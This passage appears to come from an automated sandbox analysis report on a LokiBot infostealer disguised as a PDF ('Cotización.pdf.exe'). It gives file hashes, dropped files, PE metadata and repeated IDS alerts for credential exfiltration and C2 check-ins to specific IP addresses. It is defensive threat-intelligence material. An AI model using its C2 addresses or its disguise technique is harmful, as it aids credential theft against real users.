                                    ySZpdJfqMO.exeGet hashmaliciousBrowse
                                    • 172.67.193.180
                                    MPU702734-pdf.exeGet hashmaliciousBrowse
                                    • 104.21.13.164
                                    VrepYj22q4lsHiA.exeGet hashmaliciousBrowse
                                    • 172.67.188.154
                                    ELo3NhVEFBPQ3yB.exeGet hashmaliciousBrowse
                                    • 172.67.188.154
                                    IPVrDRKfYj.exeGet hashmaliciousBrowse
                                    • 104.21.51.99
                                    JUNE SOA 2021.exeGet hashmaliciousBrowse
                                    • 172.67.188.154

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Cotizaci#U00f3n.pdf.exe.log
                                    Process:C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1216
                                    Entropy (8bit):5.355304211458859
                                    Encrypted:false
                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                    MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                    SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                    SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                    SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                    C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                                    Process:C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    File Type:very short file (no magic)
                                    Category:dropped
                                    Size (bytes):1
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3:U:U
                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview: 1
                                    C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                                    Process:C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):25070
                                    Entropy (8bit):0.6027366787850104
                                    Encrypted:false
                                    SSDEEP:3:/lbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllb5:u
                                    MD5:96B49717F2D862FB05CF7DBF53DF6F24
                                    SHA1:93790D9C6DC1EACBD18D56CEA1E823592D7168D5
                                    SHA-256:B8FB6B3B3CD97AB851D85DA2E6121CCBF674166A68F1ADFDF10218F0AEEE2DF6
                                    SHA-512:D3F0EB89422CCFCBD6F08ECFAAFAB75DC0DB2310CE8779163EF7290D042146662686509DC4A7B8E93547B751EDA9819463C37CE25C7F1A4A8BE21E2A37485451
                                    Malicious:false
                                    Reputation:low
                                    Preview: ........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user...................................

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):7.162106870557344
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    • DOS Executable Generic (2002/1) 0.01%
                                    File name:Cotizaci#U00f3n.pdf.exe
                                    File size:1104896
                                    MD5:c3412fee75b0f8758ea9905930ec2f34
                                    SHA1:e9245aba2ee62a7baffbccb725bca4bc0fd0302e
                                    SHA256:a978c99ada8c0272b0670865cdecc324d883304d54f2e90ea829891183b3aaa9
                                    SHA512:65cbf40e4d180dcd0595ab33521bc32fae6587ba60edc0114d2d0afc5bb4773a9153895e36d7675d7d187feba6ef76b2992d97b6bfc4838202fc395cd46b8a5e
                                    SSDEEP:12288:UKEH2DIJaP/GBvpov6pCoRlMRWO9fYOiXrDEr3aNhE58ZqTuwMpELFasSAFQipPG:89Bvpov6zsbfVi3E8+KfgFsip+
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..../.`..............0.............>.... ... ....@.. .......................@............@................................

                                    File Icon

                                    Icon Hash:f0debeffdffeec70

                                    Static PE Info

                                    General

                                    Entrypoint:0x4b133e
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                    Time Stamp:0x60F82FB9 [Wed Jul 21 14:31:21 2021 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:v4.0.30319
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                    Entrypoint Preview

                                    Instruction
                                    jmp dword ptr [00402000h]
                                    mov ebp, 2D000002h
                                    add dword ptr [eax], eax
                                    add byte ptr [eax+eax+00390000h], al
                                    add byte ptr [eax], al
                                    pop ss
                                    add byte ptr [eax], al
                                    add byte ptr [edx], cl
                                    add byte ptr [eax], al
                                    add byte ptr [eax+eax], al
                                    add byte ptr [eax], al
                                    add dword ptr [eax], eax
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xb12ec0x4f.text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xb20000x5e324.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1120000xc.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x20000xaf3640xaf400False0.835030592457data7.67256143073IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .rsrc0xb20000x5e3240x5e400False0.167375559516data5.64067712054IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x1120000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountry
                                    RT_ICON0xb21a00x468GLS_BINARY_LSB_FIRST
                                    RT_ICON0xb26180x1128dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
                                    RT_ICON0xb37500x2668dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                                    RT_ICON0xb5dc80x4428dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                    RT_ICON0xba2000x11028dBase III DBT, version number 0, next free block index 40
                                    RT_ICON0xcb2380x44028data
                                    RT_GROUP_ICON0x10f2700x5adata
                                    RT_VERSION0x10f2dc0x30cdata
                                    RT_MANIFEST0x10f5f80xd25XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators

                                    Imports

                                    DLLImport
                                    mscoree.dll_CorExeMain

                                    Version Infos

                                    DescriptionData
                                    Translation0x0000 0x04b0
                                    LegalCopyrightCopyright 2016
                                    Assembly Version1.0.0.0
                                    InternalNameBLjtZ.exe
                                    FileVersion1.0.0.0
                                    CompanyName
                                    LegalTrademarks
                                    Comments
                                    ProductNameuNotepad
                                    ProductVersion1.0.0.0
                                    FileDescriptionuNotepad
                                    OriginalFilenameBLjtZ.exe

                                    Network Behavior

                                    Snort IDS Alerts

                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                    07/21/21-17:01:47.860770TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14972780192.168.2.3172.67.155.45
                                    07/21/21-17:01:47.860770TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972780192.168.2.3172.67.155.45
                                    07/21/21-17:01:47.860770TCP2025381ET TROJAN LokiBot Checkin4972780192.168.2.3172.67.155.45
                                    07/21/21-17:01:48.486707TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14972880192.168.2.3172.67.155.45
                                    07/21/21-17:01:48.486707TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972880192.168.2.3172.67.155.45
                                    07/21/21-17:01:48.486707TCP2025381ET TROJAN LokiBot Checkin4972880192.168.2.3172.67.155.45
                                    07/21/21-17:01:48.941818TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972980192.168.2.3104.21.6.222
                                    07/21/21-17:01:48.941818TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972980192.168.2.3104.21.6.222
                                    07/21/21-17:01:48.941818TCP2025381ET TROJAN LokiBot Checkin4972980192.168.2.3104.21.6.222
                                    07/21/21-17:01:49.519073TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973080192.168.2.3104.21.6.222
                                    07/21/21-17:01:49.519073TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973080192.168.2.3104.21.6.222
                                    07/21/21-17:01:49.519073TCP2025381ET TROJAN LokiBot Checkin4973080192.168.2.3104.21.6.222
                                    07/21/21-17:01:50.104839TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973180192.168.2.3172.67.155.45
                                    07/21/21-17:01:50.104839TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973180192.168.2.3172.67.155.45
                                    07/21/21-17:01:50.104839TCP2025381ET TROJAN LokiBot Checkin4973180192.168.2.3172.67.155.45
                                    07/21/21-17:01:50.685572TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973280192.168.2.3104.21.6.222
                                    07/21/21-17:01:50.685572TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973280192.168.2.3104.21.6.222
                                    07/21/21-17:01:50.685572TCP2025381ET TROJAN LokiBot Checkin4973280192.168.2.3104.21.6.222
                                    07/21/21-17:01:51.305397TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973380192.168.2.3104.21.6.222
                                    07/21/21-17:01:51.305397TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973380192.168.2.3104.21.6.222
                                    07/21/21-17:01:51.305397TCP2025381ET TROJAN LokiBot Checkin4973380192.168.2.3104.21.6.222
                                    07/21/21-17:01:51.903792TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973580192.168.2.3104.21.6.222
                                    07/21/21-17:01:51.903792TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973580192.168.2.3104.21.6.222
                                    07/21/21-17:01:51.903792TCP2025381ET TROJAN LokiBot Checkin4973580192.168.2.3104.21.6.222
                                    07/21/21-17:01:52.475318TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973680192.168.2.3104.21.6.222
                                    07/21/21-17:01:52.475318TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973680192.168.2.3104.21.6.222
                                    07/21/21-17:01:52.475318TCP2025381ET TROJAN LokiBot Checkin4973680192.168.2.3104.21.6.222
                                    07/21/21-17:01:52.982084TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973780192.168.2.3172.67.155.45
                                    07/21/21-17:01:52.982084TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973780192.168.2.3172.67.155.45
                                    07/21/21-17:01:52.982084TCP2025381ET TROJAN LokiBot Checkin4973780192.168.2.3172.67.155.45
                                    07/21/21-17:01:53.544702TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973880192.168.2.3104.21.6.222
                                    07/21/21-17:01:53.544702TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973880192.168.2.3104.21.6.222
                                    07/21/21-17:01:53.544702TCP2025381ET TROJAN LokiBot Checkin4973880192.168.2.3104.21.6.222
                                    07/21/21-17:01:54.095600TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973980192.168.2.3104.21.6.222
                                    07/21/21-17:01:54.095600TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973980192.168.2.3104.21.6.222
                                    07/21/21-17:01:54.095600TCP2025381ET TROJAN LokiBot Checkin4973980192.168.2.3104.21.6.222
                                    07/21/21-17:01:54.635315TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974080192.168.2.3172.67.155.45
                                    07/21/21-17:01:54.635315TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974080192.168.2.3172.67.155.45
                                    07/21/21-17:01:54.635315TCP2025381ET TROJAN LokiBot Checkin4974080192.168.2.3172.67.155.45
                                    07/21/21-17:01:55.175688TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974280192.168.2.3172.67.155.45
                                    07/21/21-17:01:55.175688TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974280192.168.2.3172.67.155.45
                                    07/21/21-17:01:55.175688TCP2025381ET TROJAN LokiBot Checkin4974280192.168.2.3172.67.155.45
                                    07/21/21-17:01:55.876570TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974380192.168.2.3172.67.155.45
                                    07/21/21-17:01:55.876570TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.3172.67.155.45
                                    07/21/21-17:01:55.876570TCP2025381ET TROJAN LokiBot Checkin4974380192.168.2.3172.67.155.45
                                    07/21/21-17:01:56.388957TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974480192.168.2.3104.21.6.222
                                    07/21/21-17:01:56.388957TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974480192.168.2.3104.21.6.222
                                    07/21/21-17:01:56.388957TCP2025381ET TROJAN LokiBot Checkin4974480192.168.2.3104.21.6.222
                                    07/21/21-17:01:57.155353TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974580192.168.2.3172.67.155.45
                                    07/21/21-17:01:57.155353TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.3172.67.155.45
                                    07/21/21-17:01:57.155353TCP2025381ET TROJAN LokiBot Checkin4974580192.168.2.3172.67.155.45
                                    07/21/21-17:01:58.602627TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974680192.168.2.3104.21.6.222
                                    07/21/21-17:01:58.602627TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974680192.168.2.3104.21.6.222
                                    07/21/21-17:01:58.602627TCP2025381ET TROJAN LokiBot Checkin4974680192.168.2.3104.21.6.222
                                    07/21/21-17:01:59.188102TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974780192.168.2.3104.21.6.222
                                    07/21/21-17:01:59.188102TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974780192.168.2.3104.21.6.222
                                    07/21/21-17:01:59.188102TCP2025381ET TROJAN LokiBot Checkin4974780192.168.2.3104.21.6.222
                                    07/21/21-17:01:59.766561TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974880192.168.2.3104.21.6.222
                                    07/21/21-17:01:59.766561TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974880192.168.2.3104.21.6.222
                                    07/21/21-17:01:59.766561TCP2025381ET TROJAN LokiBot Checkin4974880192.168.2.3104.21.6.222
                                    07/21/21-17:02:00.294747TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974980192.168.2.3172.67.155.45
                                    07/21/21-17:02:00.294747TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.3172.67.155.45
                                    07/21/21-17:02:00.294747TCP2025381ET TROJAN LokiBot Checkin4974980192.168.2.3172.67.155.45
                                    07/21/21-17:02:01.036137TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975080192.168.2.3104.21.6.222
                                    07/21/21-17:02:01.036137TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975080192.168.2.3104.21.6.222
                                    07/21/21-17:02:01.036137TCP2025381ET TROJAN LokiBot Checkin4975080192.168.2.3104.21.6.222
                                    07/21/21-17:02:01.574632TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975180192.168.2.3172.67.155.45
                                    07/21/21-17:02:01.574632TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975180192.168.2.3172.67.155.45
                                    07/21/21-17:02:01.574632TCP2025381ET TROJAN LokiBot Checkin4975180192.168.2.3172.67.155.45
                                    07/21/21-17:02:02.144804TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975280192.168.2.3172.67.155.45
                                    07/21/21-17:02:02.144804TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975280192.168.2.3172.67.155.45
                                    07/21/21-17:02:02.144804TCP2025381ET TROJAN LokiBot Checkin4975280192.168.2.3172.67.155.45
                                    07/21/21-17:02:02.722496TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975380192.168.2.3172.67.155.45
                                    07/21/21-17:02:02.722496TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975380192.168.2.3172.67.155.45
                                    07/21/21-17:02:02.722496TCP2025381ET TROJAN LokiBot Checkin4975380192.168.2.3172.67.155.45
                                    07/21/21-17:02:03.283216TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975480192.168.2.3104.21.6.222
                                    07/21/21-17:02:03.283216TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975480192.168.2.3104.21.6.222
                                    07/21/21-17:02:03.283216TCP2025381ET TROJAN LokiBot Checkin4975480192.168.2.3104.21.6.222
                                    07/21/21-17:02:04.137003TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975580192.168.2.3104.21.6.222
                                    07/21/21-17:02:04.137003TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975580192.168.2.3104.21.6.222
                                    07/21/21-17:02:04.137003TCP2025381ET TROJAN LokiBot Checkin4975580192.168.2.3104.21.6.222
                                    07/21/21-17:02:04.701325TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975680192.168.2.3172.67.155.45
                                    07/21/21-17:02:04.701325TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975680192.168.2.3172.67.155.45
                                    07/21/21-17:02:04.701325TCP2025381ET TROJAN LokiBot Checkin4975680192.168.2.3172.67.155.45
                                    07/21/21-17:02:05.261212TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975780192.168.2.3104.21.6.222
                                    07/21/21-17:02:05.261212TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975780192.168.2.3104.21.6.222
                                    07/21/21-17:02:05.261212TCP2025381ET TROJAN LokiBot Checkin4975780192.168.2.3104.21.6.222
                                    07/21/21-17:02:05.829795TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975880192.168.2.3172.67.155.45
                                    07/21/21-17:02:05.829795TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975880192.168.2.3172.67.155.45
                                    07/21/21-17:02:05.829795TCP2025381ET TROJAN LokiBot Checkin4975880192.168.2.3172.67.155.45
                                    07/21/21-17:02:06.367161TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976280192.168.2.3172.67.155.45
                                    07/21/21-17:02:06.367161TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976280192.168.2.3172.67.155.45
                                    07/21/21-17:02:06.367161TCP2025381ET TROJAN LokiBot Checkin4976280192.168.2.3172.67.155.45
                                    07/21/21-17:02:06.914597TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976380192.168.2.3104.21.6.222
                                    07/21/21-17:02:06.914597TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976380192.168.2.3104.21.6.222
                                    07/21/21-17:02:06.914597TCP2025381ET TROJAN LokiBot Checkin4976380192.168.2.3104.21.6.222
                                    07/21/21-17:02:07.480764TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976480192.168.2.3104.21.6.222
                                    07/21/21-17:02:07.480764TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976480192.168.2.3104.21.6.222
                                    07/21/21-17:02:07.480764TCP2025381ET TROJAN LokiBot Checkin4976480192.168.2.3104.21.6.222
                                    07/21/21-17:02:08.015723TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976580192.168.2.3172.67.155.45
                                    07/21/21-17:02:08.015723TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.3172.67.155.45
                                    07/21/21-17:02:08.015723TCP2025381ET TROJAN LokiBot Checkin4976580192.168.2.3172.67.155.45
                                    07/21/21-17:02:08.645422TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.3104.21.6.222
                                    07/21/21-17:02:08.645422TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.3104.21.6.222
                                    07/21/21-17:02:08.645422TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.3104.21.6.222
                                    07/21/21-17:02:09.177828TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976780192.168.2.3172.67.155.45
                                    07/21/21-17:02:09.177828TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976780192.168.2.3172.67.155.45
                                    07/21/21-17:02:09.177828TCP2025381ET TROJAN LokiBot Checkin4976780192.168.2.3172.67.155.45
                                    07/21/21-17:02:09.683985TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976880192.168.2.3104.21.6.222
                                    07/21/21-17:02:09.683985TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976880192.168.2.3104.21.6.222
                                    07/21/21-17:02:09.683985TCP2025381ET TROJAN LokiBot Checkin4976880192.168.2.3104.21.6.222
                                    07/21/21-17:02:10.247767TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976980192.168.2.3104.21.6.222
                                    07/21/21-17:02:10.247767TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976980192.168.2.3104.21.6.222
                                    07/21/21-17:02:10.247767TCP2025381ET TROJAN LokiBot Checkin4976980192.168.2.3104.21.6.222
                                    07/21/21-17:02:10.821021TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977080192.168.2.3172.67.155.45
                                    07/21/21-17:02:10.821021TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977080192.168.2.3172.67.155.45
                                    07/21/21-17:02:10.821021TCP2025381ET TROJAN LokiBot Checkin4977080192.168.2.3172.67.155.45
                                    07/21/21-17:02:11.345001TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977680192.168.2.3172.67.155.45
                                    07/21/21-17:02:11.345001TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977680192.168.2.3172.67.155.45
                                    07/21/21-17:02:11.345001TCP2025381ET TROJAN LokiBot Checkin4977680192.168.2.3172.67.155.45
                                    07/21/21-17:02:11.925401TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977780192.168.2.3172.67.155.45
                                    07/21/21-17:02:11.925401TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977780192.168.2.3172.67.155.45
                                    07/21/21-17:02:11.925401TCP2025381ET TROJAN LokiBot Checkin4977780192.168.2.3172.67.155.45
                                    07/21/21-17:02:12.481130TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977880192.168.2.3172.67.155.45
                                    07/21/21-17:02:12.481130TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977880192.168.2.3172.67.155.45
                                    07/21/21-17:02:12.481130TCP2025381ET TROJAN LokiBot Checkin4977880192.168.2.3172.67.155.45
                                    07/21/21-17:02:13.166940TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977980192.168.2.3172.67.155.45
                                    07/21/21-17:02:13.166940TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977980192.168.2.3172.67.155.45
                                    07/21/21-17:02:13.166940TCP2025381ET TROJAN LokiBot Checkin4977980192.168.2.3172.67.155.45
                                    07/21/21-17:02:13.720336TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978080192.168.2.3172.67.155.45
                                    07/21/21-17:02:13.720336TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978080192.168.2.3172.67.155.45
